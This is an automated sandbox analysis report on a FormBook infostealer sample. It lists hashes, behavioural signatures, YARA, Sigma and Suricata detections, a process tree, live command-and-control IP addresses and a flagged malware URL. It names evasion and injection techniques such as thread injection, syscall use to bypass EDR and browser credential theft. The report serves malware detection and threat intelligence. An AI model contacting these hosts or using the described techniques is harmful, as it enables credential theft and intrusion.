Edit tour

Windows Analysis Report
NWPZbNcRxL.exe

Overview

General Information

Sample name:	NWPZbNcRxL.exe renamed because original name is a hash value
Original sample name:	05cddefc8992523851a932ec1420caf380bd0907ac51d8e8b2a8b41027781c96.exe
Analysis ID:	1587671
MD5:	37148a3441bcc11c173f13e149c7284b
SHA1:	ad8b541688375bf90cb89eeb94bc8262508401f4
SHA256:	05cddefc8992523851a932ec1420caf380bd0907ac51d8e8b2a8b41027781c96
Tags:	exeuser-adrian__luca
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

NWPZbNcRxL.exe (PID: 2920 cmdline: "C:\Users\user\Desktop\NWPZbNcRxL.exe" MD5: 37148A3441BCC11C173F13E149C7284B)

svchost.exe (PID: 3648 cmdline: "C:\Users\user\Desktop\NWPZbNcRxL.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

WnOFOMnqmLQAP.exe (PID: 3572 cmdline: "C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

logman.exe (PID: 2884 cmdline: "C:\Windows\SysWOW64\logman.exe" MD5: AE108F4DAAB2DD68470AC41F91A7A4E9)

WnOFOMnqmLQAP.exe (PID: 2412 cmdline: "C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 3292 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000005.00000002.4504489847.0000000002D20000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.4506381463.0000000005550000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.4503536884.0000000002730000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.4503787893.0000000002B00000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2417007133.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2417341861.0000000003800000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.4504631608.0000000004530000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2417817350.0000000005400000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\NWPZbNcRxL.exe", CommandLine: "C:\Users\user\Desktop\NWPZbNcRxL.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\NWPZbNcRxL.exe", ParentImage: C:\Users\user\Desktop\NWPZbNcRxL.exe, ParentProcessId: 2920, ParentProcessName: NWPZbNcRxL.exe, ProcessCommandLine: "C:\Users\user\Desktop\NWPZbNcRxL.exe", ProcessId: 3648, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\NWPZbNcRxL.exe", CommandLine: "C:\Users\user\Desktop\NWPZbNcRxL.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\NWPZbNcRxL.exe", ParentImage: C:\Users\user\Desktop\NWPZbNcRxL.exe, ParentProcessId: 2920, ParentProcessName: NWPZbNcRxL.exe, ProcessCommandLine: "C:\Users\user\Desktop\NWPZbNcRxL.exe", ProcessId: 3648, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET) M5

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T16:41:48.012262+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	49904	154.213.39.66	80	TCP
2025-01-10T16:42:11.421639+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	49980	46.38.243.234	80	TCP
2025-01-10T16:42:33.077627+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	49984	209.74.79.42	80	TCP
2025-01-10T16:42:47.377173+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	49988	47.254.140.255	80	TCP
2025-01-10T16:43:01.013291+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	49992	85.159.66.93	80	TCP
2025-01-10T16:43:14.364425+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	49996	188.114.97.3	80	TCP
2025-01-10T16:43:35.832142+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	50000	199.59.243.228	80	TCP
2025-01-10T16:43:49.757481+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	50004	208.91.197.27	80	TCP
2025-01-10T16:44:03.381007+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	50008	136.243.64.147	80	TCP
2025-01-10T16:44:24.662228+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	50012	104.21.48.1	80	TCP
2025-01-10T16:44:47.149248+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	50016	134.122.133.80	80	TCP
2025-01-10T16:45:00.493092+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.5	50020	93.127.192.201	80	TCP

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T16:41:48.012262+0100	2855465	1	A Network Trojan was detected	192.168.2.5	49904	154.213.39.66	80	TCP
2025-01-10T16:42:11.421639+0100	2855465	1	A Network Trojan was detected	192.168.2.5	49980	46.38.243.234	80	TCP
2025-01-10T16:42:33.077627+0100	2855465	1	A Network Trojan was detected	192.168.2.5	49984	209.74.79.42	80	TCP
2025-01-10T16:42:47.377173+0100	2855465	1	A Network Trojan was detected	192.168.2.5	49988	47.254.140.255	80	TCP
2025-01-10T16:43:01.013291+0100	2855465	1	A Network Trojan was detected	192.168.2.5	49992	85.159.66.93	80	TCP
2025-01-10T16:43:14.364425+0100	2855465	1	A Network Trojan was detected	192.168.2.5	49996	188.114.97.3	80	TCP
2025-01-10T16:43:35.832142+0100	2855465	1	A Network Trojan was detected	192.168.2.5	50000	199.59.243.228	80	TCP
2025-01-10T16:43:49.757481+0100	2855465	1	A Network Trojan was detected	192.168.2.5	50004	208.91.197.27	80	TCP
2025-01-10T16:44:03.381007+0100	2855465	1	A Network Trojan was detected	192.168.2.5	50008	136.243.64.147	80	TCP
2025-01-10T16:44:24.662228+0100	2855465	1	A Network Trojan was detected	192.168.2.5	50012	104.21.48.1	80	TCP
2025-01-10T16:44:47.149248+0100	2855465	1	A Network Trojan was detected	192.168.2.5	50016	134.122.133.80	80	TCP
2025-01-10T16:45:00.493092+0100	2855465	1	A Network Trojan was detected	192.168.2.5	50020	93.127.192.201	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T16:42:03.773478+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49977	46.38.243.234	80	TCP
2025-01-10T16:42:06.316926+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49978	46.38.243.234	80	TCP
2025-01-10T16:42:08.872985+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49979	46.38.243.234	80	TCP
2025-01-10T16:42:25.130232+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49981	209.74.79.42	80	TCP
2025-01-10T16:42:27.942811+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49982	209.74.79.42	80	TCP
2025-01-10T16:42:30.510802+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49983	209.74.79.42	80	TCP
2025-01-10T16:42:38.768920+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49985	47.254.140.255	80	TCP
2025-01-10T16:42:41.318777+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49986	47.254.140.255	80	TCP
2025-01-10T16:42:43.936914+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49987	47.254.140.255	80	TCP
2025-01-10T16:42:54.180791+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49989	85.159.66.93	80	TCP
2025-01-10T16:42:56.724353+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49990	85.159.66.93	80	TCP
2025-01-10T16:42:59.270659+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49991	85.159.66.93	80	TCP
2025-01-10T16:43:06.731143+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49993	188.114.97.3	80	TCP
2025-01-10T16:43:09.258140+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49994	188.114.97.3	80	TCP
2025-01-10T16:43:11.874048+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49995	188.114.97.3	80	TCP
2025-01-10T16:43:28.215881+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49997	199.59.243.228	80	TCP
2025-01-10T16:43:30.730742+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49998	199.59.243.228	80	TCP
2025-01-10T16:43:33.321105+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49999	199.59.243.228	80	TCP
2025-01-10T16:43:41.665841+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50001	208.91.197.27	80	TCP
2025-01-10T16:43:44.195904+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50002	208.91.197.27	80	TCP
2025-01-10T16:43:46.727809+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50003	208.91.197.27	80	TCP
2025-01-10T16:43:55.714507+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50005	136.243.64.147	80	TCP
2025-01-10T16:43:58.233396+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50006	136.243.64.147	80	TCP
2025-01-10T16:44:00.768784+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50007	136.243.64.147	80	TCP
2025-01-10T16:44:17.106873+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50009	104.21.48.1	80	TCP
2025-01-10T16:44:19.551968+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50010	104.21.48.1	80	TCP
2025-01-10T16:44:22.133759+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50011	104.21.48.1	80	TCP
2025-01-10T16:44:39.499291+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50013	134.122.133.80	80	TCP
2025-01-10T16:44:42.073026+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50014	134.122.133.80	80	TCP
2025-01-10T16:44:44.612294+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50015	134.122.133.80	80	TCP
2025-01-10T16:44:52.908231+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50017	93.127.192.201	80	TCP
2025-01-10T16:44:55.411921+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50018	93.127.192.201	80	TCP
2025-01-10T16:44:57.944992+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50019	93.127.192.201	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://www.f5jh81t3k1w8.sbs/blfv/?Bb6h7=gBiPvnrHa&V8=OYzX9ZD8JFvHop8tcVV8HuyU67NFgrHF6vfAGJLgGhZlSUdZ/OYKAWfRY9pPenrbZbnckt/3jffsXR68PKDW9Ecs4jeXW699fOhXXOdveN0uJ+M8ggMhXVa/XAWEfUcQVw==

Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: NWPZbNcRxL.exe	ReversingLabs: Detection: 71%
Source: NWPZbNcRxL.exe	Virustotal: Detection: 45%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.4504489847.0000000002D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4506381463.0000000005550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4503536884.0000000002730000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4503787893.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2417007133.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2417341861.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4504631608.0000000004530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2417817350.0000000005400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: NWPZbNcRxL.exe

Joe Sandbox ML: detected

Source: NWPZbNcRxL.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: logman.pdb source: svchost.exe, 00000002.00000003.2384783165.0000000003232000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2384691800.000000000321B000.00000004.00000020.00020000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000004.00000002.4504092986.0000000001538000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: WnOFOMnqmLQAP.exe, 00000004.00000002.4503538200.000000000008E000.00000002.00000001.01000000.00000005.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000000.2483941200.000000000008E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: NWPZbNcRxL.exe, 00000000.00000003.2061708811.0000000003850000.00000004.00001000.00020000.00000000.sdmp, NWPZbNcRxL.exe, 00000000.00000003.2061525090.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2322396979.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2417369880.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2320241917.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2417369880.0000000003900000.00000040.00001000.00020000.00000000.sdmp, logman.exe, 00000005.00000003.2417406704.0000000002DB9000.00000004.00000020.00020000.00000000.sdmp, logman.exe, 00000005.00000003.2419688042.0000000002F68000.00000004.00000020.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4504779497.00000000032AE000.00000040.00001000.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4504779497.0000000003110000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: NWPZbNcRxL.exe, 00000000.00000003.2061708811.0000000003850000.00000004.00001000.00020000.00000000.sdmp, NWPZbNcRxL.exe, 00000000.00000003.2061525090.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2322396979.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2417369880.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2320241917.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2417369880.0000000003900000.00000040.00001000.00020000.00000000.sdmp, logman.exe, logman.exe, 00000005.00000003.2417406704.0000000002DB9000.00000004.00000020.00020000.00000000.sdmp, logman.exe, 00000005.00000003.2419688042.0000000002F68000.00000004.00000020.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4504779497.00000000032AE000.00000040.00001000.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4504779497.0000000003110000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: logman.exe, 00000005.00000002.4503848678.0000000002B64000.00000004.00000020.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.000000000373C000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000000.2484612545.000000000311C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2705213273.000000002D9BC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: logman.pdbGCTL source: svchost.exe, 00000002.00000003.2384783165.0000000003232000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2384691800.000000000321B000.00000004.00000020.00020000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000004.00000002.4504092986.0000000001538000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: logman.exe, 00000005.00000002.4503848678.0000000002B64000.00000004.00000020.00020000.00000000.sdmp, logman.exe, 00000005.00000002.4505185726.000000000373C000.00000004.10000000.00040000.00000000.sdmp, WnOFOMnqmLQAP.exe, 00000007.00000000.2484612545.000000000311C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2705213273.000000002D9BC000.00000004.80000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C7445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00C7445A
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C7C6D1 FindFirstFileW,FindClose,	0_2_00C7C6D1
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C7C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00C7C75C
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C7EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00C7EF95
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C7F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00C7F0F2
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C7F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00C7F3F3
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C737EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00C737EF
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C73B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00C73B12
Source: C:\Users\user\Desktop\NWPZbNcRxL.exe	Code function: 0_2_00C7BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00C7BCBC
Source: C:\Windows\SysWOW64\logman.exe	Code function: 5_2_0274C640 FindFirstFileW,FindNextFileW,FindClose,	5_2_0274C640

Source: C:\Windows\SysWOW64\logman.exe	Code function: 4x nop then xor eax, eax		5_2_02739F20
Source: C:\Windows\SysWOW64\logman.exe	Code function: 4x nop then mov ebx, 00000004h		5_2_02F604DE

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49904 -> 154.213.39.66:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49904 -> 154.213.39.66:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49977 -> 46.38.243.234:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49979 -> 46.38.243.234:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49978 -> 46.38.243.234:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49981 -> 209.74.79.42:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49982 -> 209.74.79.42:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49983 -> 209.74.79.42:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49990 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49984 -> 209.74.79.42:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49995 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49984 -> 209.74.79.42:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50003 -> 208.91.197.27:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49989 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50004 -> 208.91.197.27:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50004 -> 208.91.197.27:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50001 -> 208.91.197.27:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49998 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49994 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49996 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49996 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49993 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49988 -> 47.254.140.255:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49988 -> 47.254.140.255:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50012 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50012 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50014 -> 134.122.133.80:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50017 -> 93.127.192.201:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49997 -> 199.59.243.228:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50020 -> 93.127.192.201:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50020 -> 93.127.192.201:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50002 -> 208.91.197.27:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50019 -> 93.127.192.201:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50011 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50007 -> 136.243.64.147:80
